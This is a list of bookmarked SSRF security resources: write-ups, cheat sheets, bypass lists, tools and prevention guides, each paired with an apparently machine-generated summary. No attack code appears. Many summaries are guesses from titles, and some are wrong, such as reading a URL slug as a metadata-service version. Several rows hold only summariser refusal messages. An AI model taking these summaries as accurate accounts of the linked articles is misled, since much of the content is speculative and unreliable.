| 144 | 2025-08-14 03:57:13 UTC | Let’s Understand SSRF vulnerability | by Security Lit Limited | InfoSec Wri | The content appears to focus on understanding Server-Side Request Forgery (SSRF) vulnerability, likely discussing its implications in cybersecurity. It is created by Security Lit Limited, a company specializing in information security. The article may delve into the technical aspects of SSRF, its risks, and potential mitigation strategies. It aims to educate readers on this specific security threat commonly found in web applications. |
| 145 | 2025-08-14 03:57:11 UTC | ??Roadmap to Cybersecurity in 2022, Full-Read SSRF, IDOR in GraphQL, GCP P | The content discusses a roadmap to cybersecurity in 2022, highlighting topics like Full-Read SSRF, IDOR in GraphQL, and GCP P. It suggests a plan or guide for enhancing cybersecurity practices in the upcoming year, focusing on areas such as server-side request forgery (SSRF), insecure direct object references (IDOR) in GraphQL, and Google Cloud Platform (GCP) security measures. The content aims to provide insights and strategies for individuals or organizations looking to strengthen their cybersecurity posture in 2022. |
| 146 | 2025-08-14 03:57:09 UTC | ?? $600k Bounty, Jetty Features, Response Queue Poisoning, Bypass SSRF Pro | The content mentions a $600k bounty, Jetty features, response queue poisoning, and bypassing SSRF protection. It seems to highlight significant findings or developments related to cybersecurity, possibly in the context of bug bounties, web server features, and security vulnerabilities like response queue poisoning and SSRF bypass techniques. |
| 147 | 2025-08-14 03:57:07 UTC | Exploiting XXE for SSRF. Retrieving IAM credentials of EC2… | by Gupta Bles | The content discusses exploiting XML External Entity (XXE) vulnerabilities to achieve Server-Side Request Forgery (SSRF) and retrieve Identity and Access Management (IAM) credentials of Amazon EC2 instances. The focus is on the technique of leveraging XXE vulnerabilities to manipulate XML input and trigger SSRF attacks, leading to the extraction of sensitive IAM credentials. This method highlights the importance of understanding and securing against XXE vulnerabilities to prevent unauthorized access to critical resources like IAM credentials on cloud platforms such as Amazon EC2. |
| 148 | 2025-08-14 03:57:05 UTC | Top 25 Server-Side Request Forgery (SSRF) Bug Bounty Reports | by Cristian | The content is titled "Top 25 Server-Side Request Forgery (SSRF) Bug Bounty Reports" by Cristian. It likely discusses 25 notable cases of SSRF vulnerabilities found through bug bounty programs. SSRF is a security vulnerability that allows attackers to manipulate a server into making unauthorized requests on their behalf. The article may highlight the impact of these vulnerabilities and the importance of addressing SSRF issues to enhance cybersecurity. |
| 149 | 2025-08-14 03:57:03 UTC | A Pentester’s Guide to Server Side Request Forgery (SSRF) | by Busra Demir | The content titled "A Pentester’s Guide to Server Side Request Forgery (SSRF)" by Busra Demir likely provides insights and guidance on understanding and dealing with Server Side Request Forgery (SSRF) vulnerabilities from a penetration tester's perspective. It may cover the detection, exploitation, and mitigation of SSRF issues to enhance the security of web applications. The article is expected to offer practical advice and techniques for identifying and addressing SSRF risks in server-side code to prevent unauthorized access and data leakage. |
| 150 | 2025-08-14 03:57:01 UTC | AWS internal metadata accessed through SSRF by Chaining an Open Redirect bu | The content discusses a security vulnerability where AWS internal metadata is accessed through Server-Side Request Forgery (SSRF) by exploiting an Open Redirect vulnerability. This technique allows an attacker to manipulate requests to access sensitive information stored in AWS metadata. It highlights the importance of securing against SSRF attacks and the potential risks associated with chaining vulnerabilities like Open Redirect. |
| 151 | 2025-08-14 03:56:59 UTC | Finding SSRF via HTML Injection inside a PDF file on AWS EC2 | by Riyaz Wal | The content discusses the discovery of Server-Side Request Forgery (SSRF) through HTML injection within a PDF file hosted on Amazon Web Services (AWS) Elastic Compute Cloud (EC2) by Riyaz Wal. This vulnerability highlights the potential security risks associated with SSRF and how it can be exploited through unexpected vectors like PDF files. It underscores the importance of thorough security testing and mitigation strategies to prevent such attacks on cloud-based platforms like AWS EC2. |
| 152 | 2025-08-14 03:56:57 UTC | Escalating SSRF to Accessing all user PII information by aws metadata | by | The content appears to discuss escalating SSRF (Server-Side Request Forgery) attacks to gain access to all user Personally Identifiable Information (PII) through AWS metadata. This type of attack involves manipulating a server to make requests on behalf of the attacker, potentially leading to unauthorized access to sensitive data. The article likely delves into the technical details of how SSRF vulnerabilities can be exploited to access PII stored in AWS metadata, highlighting the importance of securing systems against such attacks. |
| 153 | 2025-08-14 03:56:55 UTC | Chaining an Blind SSRF bug to Get an RCE | by Santosh Kumar Sha (@killmonga | The content discusses chaining a Blind Server-Side Request Forgery (SSRF) bug to achieve Remote Code Execution (RCE). The author, Santosh Kumar Sha (@killmonga), likely shares insights on exploiting vulnerabilities to escalate from SSRF to RCE. This process involves leveraging SSRF to manipulate server-side requests and ultimately execute arbitrary code on the target system. The content may provide a detailed explanation of the steps involved in this attack scenario. |
| 154 | 2025-08-14 03:56:53 UTC | Story Behind Sweet SSRF.. Persistence is the Key to Success.? | by Rohit So | The content seems to discuss the story behind achieving success through persistence, possibly related to Sweet SSRF. The key message is likely to emphasize the importance of perseverance in reaching goals. The author, Rohit So, may share insights or personal experiences to highlight how persistence plays a crucial role in achieving success. |
| 155 | 2025-08-14 03:56:51 UTC | Story of a really cool SSRF bug.. Hello all! My name is Vedant, also… | by | The content appears to be a story about a significant Server-Side Request Forgery (SSRF) bug encountered by someone named Vedant. The bug is described as "really cool," suggesting it was interesting or unique. However, the details of the bug and its impact are not provided in the summary. |
| 156 | 2025-08-14 03:56:49 UTC | How Github recon help me to find NINE FULL SSRF Vulnerability with AWS meta | The content discusses how utilizing Github reconnaissance techniques helped uncover nine significant Server-Side Request Forgery (SSRF) vulnerabilities associated with AWS metadata. This highlights the effectiveness of conducting thorough recon activities on Github to identify security weaknesses, particularly in relation to SSRF vulnerabilities within AWS infrastructure. |
| 157 | 2025-08-14 03:56:47 UTC | Finding SSRF BY Full Automation. Hi, everyone | by Santosh Kumar Sha (@kill | The content appears to be about finding Server-Side Request Forgery (SSRF) vulnerabilities through full automation. The author, Santosh Kumar Sha, discusses techniques or tools related to SSRF detection. The title suggests a focus on automation in the process of identifying SSRF vulnerabilities. |
| 158 | 2025-08-14 03:56:45 UTC | Intro to SSRF. And how your firewall failed you. | by Vickie Li | Medium | The content titled "Intro to SSRF. And how your firewall failed you" by Vickie Li on Medium introduces SSRF (Server-Side Request Forgery) and discusses how firewalls can be ineffective in preventing this type of attack. SSRF allows attackers to manipulate a server into making unauthorized requests, bypassing traditional security measures like firewalls. The article likely delves into the concept of SSRF, its implications for cybersecurity, and how organizations can better protect against such threats. |
| 159 | 2025-08-14 03:56:43 UTC | Vimeo upload function SSRF. TL;DR | by Sayed Abdelhafiz | Medium | The content seems to discuss a potential Server-Side Request Forgery (SSRF) vulnerability related to Vimeo's upload function. This type of vulnerability could allow an attacker to manipulate the server into making unauthorized requests, potentially leading to data breaches or other security issues. It appears that the author, Sayed Abdelhafiz, has written about this topic on Medium. The focus is likely on raising awareness about this security risk and the importance of addressing such vulnerabilities to protect systems from exploitation. |
| 160 | 2025-08-14 03:56:41 UTC | Just Gopher It: Escalating a Blind SSRF to RCE for $15k — Yahoo Mail | by S | The content discusses escalating a Blind Server-Side Request Forgery (SSRF) vulnerability to Remote Code Execution (RCE) in Yahoo Mail, earning a reward of $15,000. The author shares their experience and techniques used to exploit the vulnerability, highlighting the importance of thorough testing and persistence in finding security flaws. The title "Just Gopher It" suggests a playful approach to tackling the challenge, emphasizing the need for creativity and determination in cybersecurity research. |
| 161 | 2025-08-14 03:56:39 UTC | Cloud SSRF | The content provided is very brief and lacks specific details or context. It seems to refer to a topic or concept related to Cloud SSRF (Server-Side Request Forgery), which involves exploiting vulnerabilities in cloud services to manipulate server requests. However, without further information, it is challenging to provide a detailed summary. |
| 162 | 2025-08-14 03:56:37 UTC | https://labs.detectify.com/2022/09/23/ssrf-vulns-and-where-to-find-them/ | The content discusses Server-Side Request Forgery (SSRF) vulnerabilities, their impact, and how to find and exploit them. It explains how SSRF can be used to access internal systems, leak sensitive information, and perform various attacks. The article also covers common SSRF attack scenarios, such as bypassing security controls and accessing metadata endpoints. It emphasizes the importance of understanding SSRF risks and implementing proper security measures to prevent exploitation. The content provides insights into detecting and mitigating SSRF vulnerabilities to enhance the security posture of web applications. |
| 163 | 2025-08-14 03:56:35 UTC | PHP SSRF Techniques. How to bypass filter_var()… | by theMiddle | secjuice™ | The content discusses PHP Server-Side Request Forgery (SSRF) techniques and how to bypass the filter_var() function. It likely delves into methods to manipulate input validation functions in PHP to exploit SSRF vulnerabilities. The author may provide insights on how attackers can circumvent security measures to perform SSRF attacks. The focus is on understanding and potentially exploiting weaknesses in PHP applications related to SSRF. |
| 164 | 2025-08-14 03:56:33 UTC | How i found an SSRF in Yahoo! Guesthouse (Recon Wins) | by Th3G3nt3lman | M | The content appears to be a blog post or article titled "How I found an SSRF in Yahoo! Guesthouse" by an author named Th3G3nt3lman. The focus seems to be on discovering a Server-Side Request Forgery (SSRF) vulnerability in Yahoo! Guesthouse through reconnaissance efforts. The author likely shares their experience, methods used, and the importance of reconnaissance in identifying security vulnerabilities. |
| 165 | 2025-08-14 03:56:31 UTC | Reading Internal Files using SSRF vulnerability | by Neeraj Sonaniya | Medi | The content discusses the exploitation of Server-Side Request Forgery (SSRF) vulnerability to read internal files. The author, Neeraj Sonaniya, explores how SSRF can be used to access sensitive information stored on a server. This vulnerability allows an attacker to manipulate a server into making requests on their behalf, potentially leading to unauthorized access to internal files. The article likely provides insights into the risks associated with SSRF vulnerabilities and how they can be mitigated to protect against unauthorized data access. |
| 166 | 2025-08-14 03:56:25 UTC | qazbnm456/awesome-web-security | The content is a reference to a GitHub repository named "qazbnm456/awesome-web-security." This repository likely contains a curated list of resources, tools, and information related to web security. The title and content simply mention the repository's name without providing specific details about its contents. |
| 167 | 2025-08-14 03:56:23 UTC | rbndr | The content provided is a single word, "rbndr," which does not offer any context or information to summarize. |
| 168 | 2025-08-14 03:56:21 UTC | GitHub - bcoles/ssrf_proxy: SSRF Proxy facilitates tunneling HTTP communica | The content refers to a GitHub repository named "ssrf_proxy" created by the user bcoles. The repository likely contains code for an SSRF Proxy tool designed to facilitate tunneling HTTP communication. This tool may help users manage Server-Side Request Forgery (SSRF) vulnerabilities by acting as a proxy for HTTP requests. The tool could potentially assist in testing and securing web applications against SSRF attacks by providing a controlled environment for handling HTTP traffic. |
| 169 | 2025-08-14 03:56:19 UTC | AppSecEU15-Server_side_browsing_considered_harmful.pdf | The content provided is the title of a document named "AppSecEU15-Server_side_browsing_considered_harmful.pdf." The title suggests that the document likely discusses the potential risks or negative implications associated with server-side browsing in the context of application security. It implies that server-side browsing may pose threats or vulnerabilities that could be harmful to the security of applications. The document may delve into the reasons why server-side browsing is considered detrimental and provide insights on how to mitigate these risks. |
| 170 | 2025-08-14 03:56:17 UTC | What is server-side request forgery (SSRF)? | Acunetix | The content is about server-side request forgery (SSRF) and is likely an introduction to the topic. SSRF is a security vulnerability that allows attackers to make requests on behalf of the server, potentially accessing sensitive information or services. It is a common issue in web applications and can lead to serious consequences if exploited. Understanding SSRF is crucial for developers and security professionals to prevent such attacks and protect their systems from unauthorized access. |
| 171 | 2025-08-14 03:56:15 UTC | SSRF bible. Cheatsheet - Google Docs | The content provided is titled "SSRF bible. Cheatsheet" on Google Docs. It appears to be a document or resource related to Server-Side Request Forgery (SSRF), a type of web security vulnerability. The document likely contains a compilation of information, tips, and techniques related to SSRF attacks and defenses. It may serve as a quick reference guide or cheat sheet for individuals looking to understand and protect against SSRF vulnerabilities. |
| 172 | 2025-08-14 03:56:12 UTC | The Tale Of SSRF To RCE on .GOV Domain | by Tobydavenn | Sep, 2022 | Medium | The content is titled "The Tale Of SSRF To RCE on .GOV Domain" by Tobydavenn on Medium in September 2022. It likely discusses a story or experience related to exploiting SSRF (Server-Side Request Forgery) vulnerabilities to achieve Remote Code Execution (RCE) on a .GOV domain. The article may provide insights into cybersecurity, hacking techniques, and the importance of securing government websites against such attacks. |
| 173 | 2025-08-14 03:56:10 UTC | (640) An overlooked parameter leads to a critical SSRF in Dropbox bug bount | The content discusses a critical Server-Side Request Forgery (SSRF) vulnerability discovered in Dropbox's bug bounty program due to an overlooked parameter. This vulnerability could potentially allow attackers to manipulate server requests and access sensitive information. The SSRF flaw was identified as a significant security issue that could have serious consequences if exploited. This finding highlights the importance of thorough security testing and the need for companies to prioritize identifying and addressing such vulnerabilities to protect their systems and data. |
| 174 | 2025-08-14 03:56:08 UTC | SSRF Bypass List | The content titled "SSRF Bypass List" appears to be a list related to Server-Side Request Forgery (SSRF) bypass techniques. It likely contains information on ways to circumvent SSRF protections or restrictions. The list may include methods or strategies to exploit vulnerabilities and access resources that are typically restricted. It serves as a resource for individuals interested in understanding and potentially mitigating SSRF risks. |
| 175 | 2025-08-14 03:56:06 UTC | https://infosecwriteups.com/walkthrough-weather-app-hack-the-box-web-challenge-34b0c930dfca | The content is a walkthrough of a web challenge called "Weather App" from the platform Hack The Box. It provides a step-by-step guide on how to solve the challenge, including identifying vulnerabilities, exploiting them, and gaining access to the target system. The walkthrough covers topics such as reconnaissance, enumeration, exploitation, and privilege escalation. It aims to help readers understand the process of hacking a web application and improving their cybersecurity skills. |
| 176 | 2025-08-14 03:56:05 UTC | hackerone-reports/tops_by_bug_type/TOPSSRF.md at master · reddelexc/hackero | The content refers to a file named TOPSSRF.md in the hackerone-reports repository on GitHub, specifically under the tops_by_bug_type directory. The file is maintained by a user named reddelexc under the hackero project. The content of the file likely contains information related to reports or data on top security vulnerabilities or bugs categorized by type, with a focus on Server-Side Request Forgery (SSRF) vulnerabilities. |
| 177 | 2025-08-14 03:56:00 UTC | Server Side Request Forgery (SSRF) Attacks & How to Prevent Them - Bright S | The content seems to discuss Server Side Request Forgery (SSRF) attacks and prevention methods. SSRF attacks involve manipulating a server into making unintended requests, potentially leading to data breaches or server exploitation. Preventive measures are likely to be detailed, such as input validation, restricting access to sensitive resources, and using secure coding practices. The article may provide insights on safeguarding servers against SSRF attacks to enhance cybersecurity. |
| 178 | 2025-08-14 03:55:56 UTC | SSRF Vulnerability From a Developer’s Perspective | by Gupta Bless | Geek C | The content discusses Server-Side Request Forgery (SSRF) vulnerability from a developer's perspective. It is written by Gupta Bless on Geek C. The article likely delves into the implications, risks, and potential solutions related to SSRF vulnerabilities in web applications, providing insights and guidance for developers to understand and address this security concern effectively. |
| 179 | 2025-08-14 03:55:54 UTC | https://infosecwriteups.com/multiple-http-redirects-to-bypass-ssrf-protections-45c894e5d41c | The content discusses a technique using multiple HTTP redirects to bypass Server-Side Request Forgery (SSRF) protections. By chaining together several HTTP redirects, an attacker can manipulate the server to access internal resources or perform unauthorized actions. This method can be used to exploit vulnerabilities in web applications that are susceptible to SSRF attacks. The article provides insights into how attackers can leverage this technique and offers recommendations for organizations to strengthen their defenses against SSRF vulnerabilities. |
| 180 | 2025-08-14 03:55:52 UTC | WSTG - v4.2 | OWASP Foundation | The content is a reference to the Web Security Testing Guide (WSTG) version 4.2 provided by the OWASP Foundation. The WSTG is a comprehensive guide that outlines best practices and techniques for testing the security of web applications. It covers various aspects of web security testing to help developers and security professionals identify and address vulnerabilities in web applications. The OWASP Foundation is a non-profit organization dedicated to improving software security, and the WSTG is one of the resources they offer to promote secure web development practices. |
| 181 | 2025-08-14 03:55:50 UTC | Server-Side Request Forgery (SSRF) - Intigriti | The content is about Server-Side Request Forgery (SSRF) as discussed by Intigriti. SSRF is a security vulnerability where an attacker can manipulate a server into making unauthorized requests. It is a serious threat that can lead to data breaches and unauthorized access. Intigriti likely provides information or services related to identifying and mitigating SSRF vulnerabilities. |
| 182 | 2025-08-14 03:55:48 UTC | https://reconshell.com/awesome-ssrf-writeups/ | The provided link likely leads to a webpage listing various write-ups related to Server-Side Request Forgery (SSRF) vulnerabilities. These write-ups are likely to contain detailed explanations, examples, and techniques related to identifying and exploiting SSRF vulnerabilities in web applications. Readers can expect to find valuable insights, case studies, and practical knowledge on how SSRF vulnerabilities can be leveraged for security testing and exploitation purposes. The content is likely to be beneficial for security researchers, penetration testers, and individuals interested in learning more about SSRF vulnerabilities and their implications in cybersecurity. |
| 183 | 2025-08-14 03:55:47 UTC | GitHub - swisskyrepo/SSRFmap: Automatic SSRF fuzzer and exploitation tool | The content is about a tool called SSRFmap, available on GitHub under the swisskyrepo repository. SSRFmap is an automatic SSRF fuzzer and exploitation tool. It is designed to help identify and exploit Server-Side Request Forgery (SSRF) vulnerabilities in web applications. The tool automates the process of testing for SSRF vulnerabilities, making it easier for security professionals to identify and address these issues. |
| 184 | 2025-08-14 03:55:44 UTC | https://github.com/knassar702/lorsrf | The provided link leads to a GitHub repository belonging to user knassar702 with the title "lorsrf." The content of the repository is not specified in the request. It is recommended to visit the GitHub link to explore the contents, which likely include source code, documentation, or other resources related to the project. |
| 185 | 2025-08-14 03:55:42 UTC | 10 Types of Web Vulnerabilities that are Often Missed - Detectify Labs | The content titled "10 Types of Web Vulnerabilities that are Often Missed" by Detectify Labs likely discusses various common web vulnerabilities that are frequently overlooked by developers and security professionals. It may provide insights into lesser-known vulnerabilities that can pose risks to websites and web applications. The article could offer valuable information on how to detect and address these vulnerabilities to enhance the security of online platforms. |
| 186 | 2025-08-14 03:55:40 UTC | Beginner Guide To Exploit Server Side Request Forgery (SSRF) Vulnerability | The content is a beginner's guide to exploiting Server Side Request Forgery (SSRF) vulnerability. It likely covers the basics of identifying and exploiting SSRF vulnerabilities, which involve manipulating a server to make unauthorized requests on behalf of the attacker. The guide may provide insights into how SSRF vulnerabilities can be leveraged for malicious purposes and the potential risks associated with such exploits. It serves as an introductory resource for individuals looking to understand and potentially exploit SSRF vulnerabilities. |
| 187 | 2025-08-14 03:55:36 UTC | On SSRF (Server Side Request Forgery) or Simple Stuff Rodolfo Found | The content discusses SSRF (Server Side Request Forgery) and the discoveries made by Rodolfo related to this vulnerability. SSRF involves manipulating a server to make unauthorized requests on behalf of the attacker. Rodolfo's findings likely pertain to identifying and potentially exploiting SSRF vulnerabilities. This type of attack can have serious consequences, allowing attackers to access sensitive information or internal systems. It is crucial for organizations to be aware of SSRF risks and implement security measures to prevent such attacks. |
| 188 | 2025-08-14 03:55:35 UTC | SSRF In The Wild - Vickie Li’s Security Blog | The content is titled "SSRF In The Wild - Vickie Li’s Security Blog." It likely discusses Server-Side Request Forgery (SSRF) vulnerabilities encountered in real-world scenarios, possibly shared by Vickie Li on her security blog. This type of vulnerability allows attackers to manipulate a server into making unintended requests, potentially leading to unauthorized access or data leakage. The blog post may provide insights, examples, or solutions related to SSRF vulnerabilities to raise awareness and improve security practices. |
| 189 | 2025-08-14 03:55:32 UTC | SSRF - HowToHunt | The content appears to be about Server-Side Request Forgery (SSRF) and a guide or tutorial called "HowToHunt" related to this topic. SSRF is a security vulnerability that allows an attacker to manipulate a server into making unauthorized requests. The "HowToHunt" guide likely provides information on how to identify and mitigate SSRF vulnerabilities. It seems to be a concise reference or resource for individuals interested in learning more about SSRF and how to protect against it. |
| 190 | 2025-08-14 03:55:30 UTC | CodeNinja | The content provided is simply the term "CodeNinja." It appears to be a standalone word without any additional context or information provided. |
| 191 | 2025-08-14 03:55:28 UTC | SSRF Cheat Sheet & Bypass Techniques | The content is a reference guide for Server-Side Request Forgery (SSRF) attacks, providing a cheat sheet and techniques to bypass security measures. SSRF is a type of vulnerability that allows attackers to manipulate a server into making unauthorized requests on their behalf. The cheat sheet likely includes common payloads and methods to exploit SSRF vulnerabilities, while the bypass techniques may offer ways to circumvent protections put in place to prevent such attacks. This resource is valuable for security professionals and developers to understand and defend against SSRF threats effectively. |
| 192 | 2025-08-14 03:55:26 UTC | The journey of Web Cache Firewall Bypass to SSRF to AWS credentials compr | The content discusses the progression from a Web Cache Firewall Bypass to Server-Side Request Forgery (SSRF) and ultimately obtaining AWS credentials through a comprehensive process. This journey likely involves exploiting vulnerabilities in web systems to bypass security measures, manipulate server requests, and ultimately gain access to sensitive AWS credentials. The content highlights the evolution of techniques used by attackers to compromise systems and underscores the importance of robust security measures to prevent such breaches. |
| 193 | 2025-08-14 03:55:20 UTC | https://github.com/lutfumertceylan/top25-parameter | The provided link redirects to a GitHub repository named "top25-parameter" created by a user named lutfumertceylan. The content of the repository is not specified in the request. It is recommended to visit the GitHub link directly to explore the details of the "top25-parameter" repository and its contents. |
| 194 | 2025-08-14 03:55:18 UTC | Server Side Request Forgery | Server Side Request Forgery (SSRF) is a vulnerability where an attacker tricks a server into making unintended requests on their behalf. This can lead to unauthorized access to internal systems, data leaks, and potential server exploitation. Preventing SSRF involves input validation, using whitelists for allowed URLs, and restricting access to sensitive resources. It is crucial for developers and organizations to be aware of SSRF risks and implement security measures to mitigate this threat. |
| 195 | 2025-08-14 03:55:16 UTC | https://www.hahwul.com/phoenix/ssrf-open-redirect/ | The content discusses the exploitation of Server-Side Request Forgery (SSRF) vulnerabilities combined with Open Redirect flaws. It explains how attackers can abuse these weaknesses to redirect users to malicious websites, potentially leading to further attacks like phishing or malware distribution. The article emphasizes the importance of understanding and mitigating these risks to protect web applications and users. It provides insights into the technical aspects of these vulnerabilities and offers guidance on how to prevent such attacks by implementing secure coding practices and conducting thorough security assessments. |
| 196 | 2025-08-14 03:55:12 UTC | A Glossary of Blind SSRF Chains – Assetnote | The content is likely a glossary provided by Assetnote that focuses on Blind Server-Side Request Forgery (SSRF) chains. This glossary is likely to contain definitions and explanations related to the concept of Blind SSRF chains, which are a type of vulnerability that can be exploited by attackers to make requests on behalf of the server. It is a resource that may help individuals understand and identify Blind SSRF chains and their implications in cybersecurity. |
| 197 | 2025-08-14 03:55:10 UTC | Awesome Bug Bounty Tools | The content simply states "Awesome Bug Bounty Tools" without providing any specific information or details about the tools. It seems to be a title or heading rather than a detailed explanation or list of tools. |
| 198 | 2025-08-14 03:55:08 UTC | https://github.com/ethicalhackingplayground/ssrf-king | The provided link leads to a GitHub repository named "ssrf-king" under the username "ethicalhackingplayground." The content of the repository is not specified in the request and therefore cannot be summarized. It is recommended to visit the GitHub link directly to explore the contents of the "ssrf-king" repository for information related to SSRF (Server-Side Request Forgery) and other relevant topics. |
| 199 | 2025-08-14 03:55:07 UTC | https://www.hackingarticles.in/burp-suite-for-pentester-hackbar/ | The content discusses the use of Burp Suite, a popular tool for penetration testing, in combination with Hackbar, a Firefox add-on. It explains how to install and use Hackbar within Burp Suite to enhance the testing process by enabling quick access to various functionalities like encoding, decoding, and executing commands. The article provides step-by-step instructions on setting up Hackbar in Burp Suite and demonstrates its utility in performing tasks such as URL manipulation and payload testing. Overall, it highlights the benefits of integrating Hackbar with Burp Suite for efficient and effective penetration testing. |
| 200 | 2025-08-14 03:55:04 UTC | A Pentester’s Guide to Server Side Request Forgery (SSRF) | The content is titled "A Pentester’s Guide to Server Side Request Forgery (SSRF)" but does not provide any specific information or details about SSRF. It seems to be an introductory title or placeholder for a guide aimed at penetration testers exploring SSRF vulnerabilities. |
| 201 | 2025-08-14 03:55:02 UTC | Dark Side 108: Intro to SSRF — Server-Side Request Forgery | by Katlyn Gall | The content titled "Dark Side 108: Intro to SSRF — Server-Side Request Forgery" by Katlyn Gall likely introduces readers to the concept of SSRF (Server-Side Request Forgery). SSRF involves manipulating a server into making unintended requests, potentially leading to security vulnerabilities. The article may delve into the risks associated with SSRF attacks and ways to prevent them. It serves as an introductory guide to understanding and addressing SSRF threats in web applications. |
| 202 | 2025-08-14 03:55:00 UTC | $10000 Facebook SSRF (Bug Bounty) | by Amine Aboud | Medium | The content is titled "$10000 Facebook SSRF (Bug Bounty)" by Amine Aboud on Medium. It likely discusses a security vulnerability known as Server-Side Request Forgery (SSRF) found on Facebook, which was eligible for a bug bounty reward of $10,000. The article may detail the discovery and reporting process of this SSRF bug on Facebook's platform, highlighting the importance of bug bounty programs in enhancing cybersecurity. |
| 203 | 2025-08-14 03:54:58 UTC | Blind SSRF - The Hide & Seek Game | by Jerry Shah (Jerry) | Medium | The content titled "Blind SSRF - The Hide & Seek Game" by Jerry Shah on Medium likely discusses the concept of Server-Side Request Forgery (SSRF) vulnerabilities, where attackers manipulate a server into making unauthorized requests. The title suggests a focus on a specific type of SSRF attack known as Blind SSRF, which involves making requests without receiving direct responses. The author, Jerry Shah, may delve into the intricacies of this type of attack and provide insights on how to detect and prevent Blind SSRF vulnerabilities. |
| 204 | 2025-08-14 03:54:56 UTC | Server-Side Request Forgery — SSRF: Exploitation Technique | by goswamiijay | The content titled "Server-Side Request Forgery — SSRF: Exploitation Technique" by goswamiijay likely discusses the concept of Server-Side Request Forgery (SSRF) as an exploitation technique. SSRF involves manipulating a server into making unintended requests, potentially leading to unauthorized access or data leakage. The article may delve into how SSRF attacks work, their impact on web applications, and strategies to prevent such vulnerabilities. |
| 205 | 2025-08-14 03:54:54 UTC | Exploiting: SSRF For Admin Access | by Gupta Bless | InfoSec Write-ups | The content appears to be about exploiting Server-Side Request Forgery (SSRF) vulnerabilities to gain admin access. It is likely a write-up by Gupta Bless in the field of Information Security (InfoSec). SSRF is a type of security vulnerability that allows an attacker to manipulate the server into making unauthorized requests, potentially leading to unauthorized access. The article may provide insights or techniques on how SSRF can be exploited to gain admin privileges. |
| 206 | 2025-08-14 03:54:50 UTC | https://link.medium.com/3LqSxFV4j9 | I'm sorry, but I am unable to access external content such as the Medium link provided. If you could provide a brief description or key points from the content, I would be happy to help summarize it for you. |
| 207 | 2025-08-14 03:54:49 UTC | Oh snap! We don't support this version of your browser, and neither should | The content emphasizes that a specific version of the browser is not supported. It suggests that users should not rely on this unsupported version. The message is concise and direct, indicating that the browser version in question is not compatible with the platform or service being accessed. |
| 208 | 2025-08-14 03:54:46 UTC | https://medium.com/bugbountywriteup/server-side-request-forgery-ssrf-f62235a2c151 | The content discusses Server-Side Request Forgery (SSRF), a vulnerability that allows attackers to manipulate a server into making unintended requests. It explains how SSRF works, its impact on security, and provides examples of SSRF attacks. The article also covers how to prevent SSRF attacks, including input validation, using allowlists, and restricting access to sensitive resources. Additionally, it emphasizes the importance of understanding and mitigating SSRF vulnerabilities to protect systems from potential exploitation. |
| 209 | 2025-08-14 03:54:44 UTC | My First Bug: Blind SSRF Through Profile Picture Upload | by swaysthinking | The content is titled "My First Bug: Blind SSRF Through Profile Picture Upload" by swaysthinking. The main focus is likely on the author's experience discovering a blind Server-Side Request Forgery (SSRF) vulnerability through a profile picture upload feature. This bug allowed unauthorized access to internal systems through manipulating the server's requests. The content may detail the discovery process, the impact of the vulnerability, and possibly the steps taken to report and address the issue. |
| 210 | 2025-08-14 03:54:42 UTC | Vimeo SSRF with code execution potential. | by Harsh Jaiswal | InfoSec Writ | The content discusses a security vulnerability in Vimeo known as Server-Side Request Forgery (SSRF) that could potentially lead to code execution. The vulnerability was identified by Harsh Jaiswal and poses a risk to the platform's security. SSRF allows attackers to manipulate server requests and potentially execute malicious code. This highlights the importance of addressing and patching such vulnerabilities to prevent unauthorized access and protect user data. |
| 211 | 2025-08-14 03:54:40 UTC | Story of a 2.5k Bounty — SSRF on Zimbra Led to Dump All Credentials in Clea | The content discusses a story where a bounty of $2.5k was rewarded for discovering a Server-Side Request Forgery (SSRF) vulnerability on Zimbra. This vulnerability allowed the attacker to dump all credentials in cleartext. The focus is on the impact of the SSRF exploit on Zimbra's security and the importance of addressing such vulnerabilities to prevent unauthorized access to sensitive information. |
| 212 | 2025-08-14 03:54:38 UTC | Server_Side_Request_Forgery_Prevention_Cheat_Sheet_SSRF_Bible.pdf | The content is a document titled "Server_Side_Request_Forgery_Prevention_Cheat_Sheet_SSRF_Bible.pdf." It likely contains information and guidelines on preventing server-side request forgery (SSRF) attacks. SSRF is a vulnerability where an attacker can manipulate a server into making unintended requests on their behalf. The document may provide cheat sheets or best practices to help developers protect their systems from SSRF attacks. It could be a valuable resource for understanding and mitigating this security risk. |
| 213 | 2025-08-14 03:54:36 UTC | Capital One SSRF | Kontra Application Security Training | The content appears to mention a topic related to Capital One's Server-Side Request Forgery (SSRF) vulnerability. It may also refer to Kontra Application Security Training, which could be a resource for learning about application security, potentially including how to identify and mitigate SSRF vulnerabilities. The content seems to highlight the importance of understanding and addressing security issues like SSRF to protect sensitive data and systems from potential cyber threats. |
| 214 | 2025-08-14 03:54:34 UTC | https://link.medium.com/j3rkNajmr5 | I'm sorry, but I am unable to access external content such as the one you provided. If you could provide me with a brief overview or key points from the content, I would be happy to help summarize it for you in 100 words or less. |
| 215 | 2025-08-14 03:54:32 UTC | Exploiting an SSRF: Trials and Tribulations | by A Bug’z Life | A Bug’z Lif | The content seems to focus on the topic of exploiting Server-Side Request Forgery (SSRF) vulnerabilities. It suggests that the process of exploiting SSRF vulnerabilities can be challenging and may involve various trials and tribulations. The author, identified as A Bug'z Life, likely shares insights, experiences, or techniques related to SSRF exploitation. The content may delve into the complexities and difficulties encountered when attempting to exploit SSRF vulnerabilities. |
| 216 | 2025-08-14 03:54:30 UTC | SSRF (Server Side Request Forgery) - HackTricks | The content is about SSRF (Server Side Request Forgery) and is part of the HackTricks series. SSRF is a vulnerability that allows an attacker to make requests on behalf of the server, potentially accessing internal systems or performing malicious actions. The HackTricks series likely provides information on exploiting and defending against SSRF attacks. |
| 217 | 2025-08-14 03:54:28 UTC | https://link.medium.com/CWHpG8ePe2 | I'm unable to access external content to provide a summary. If you can provide the main points or key ideas from the content, I'd be happy to help summarize it for you in 100 words or less. |
| 218 | 2025-08-14 03:54:26 UTC | https://blog.appsecco.com/server-side-request-forgery-ssrf-and-aws-ec2-instances-after-instance-meta-data-service-version-38fc1ba1a28a | The content discusses Server-Side Request Forgery (SSRF) vulnerabilities in AWS EC2 instances after the introduction of the Instance Metadata Service version 38fc1ba1a28a. It highlights how attackers can exploit SSRF to access sensitive information or launch attacks within the AWS environment. The article provides insights into the impact of SSRF vulnerabilities, the importance of securing EC2 instances, and recommendations for mitigating SSRF risks. It emphasizes the need for proper security measures to protect against SSRF threats in AWS environments. |
